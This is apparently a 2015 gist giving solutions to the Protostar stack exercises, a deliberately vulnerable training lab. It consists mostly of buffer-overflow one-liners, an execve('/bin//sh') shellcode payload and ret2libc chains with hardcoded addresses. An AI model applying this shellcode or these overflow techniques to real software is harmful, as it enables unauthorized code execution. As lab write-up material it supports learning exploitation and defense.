
@Grazfather
Created May 23, 2015 20:13
exploit-exercises protostar

Stack solutions

Stack 0

python -c "print 'A'*70" | ./stack0

Stack 1

./stack1 `python -c "print 'dcba'*17"`

Stack 2

GREENIE="`python -c \"print '\x0a\x0d\x0a\x0d'*17\"`" ./stack2

Stack 3

readelf -s ./stack3 | grep win
python -c "print 'AAAA'*16+'\x24\x84\x04\x08'" | ./stack3

Stack 4

readelf -s ./stack4 | grep win
python -c "print 'AAAA'*19+'\xf4\x83\x04\x08'" | ./stack4

Stack 5

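# Python 2 script
import struct

# execve("/bin//sh") followed by exit()
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
buffer = 0xbffff810  # Address of the buffer on the stack
delta = 0x4c  # Distance to RA on stack
ra = buffer + delta  # Address of the saved RA slot

# Filler up to the RA, then an RA pointing just past itself, where the shellcode sits
payload = '\x90' * delta
payload += struct.pack('<I', ra + 4)
payload += shellcode

print payload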

Stack 6

  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf
cat <(python -c "print 'a'*80 + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'") - | ./stack6

Stack 7

Just ret to another ret!

  • address of system: 0xb7ecffb0
  • address of exit: 0xb7ec60c0
  • address of "/bin/sh": 0xb7fb63bf
  • address of 'ret' instruction: 0x08048553
cat <(python -c "print 'a'*80 + '\x53\x85\x04\x08' + '\xb0\xff\xec\xb7' + '\xc0\x60\xec\xb7' + '\xbf\x63\xfb\xb7'") - | ./stack7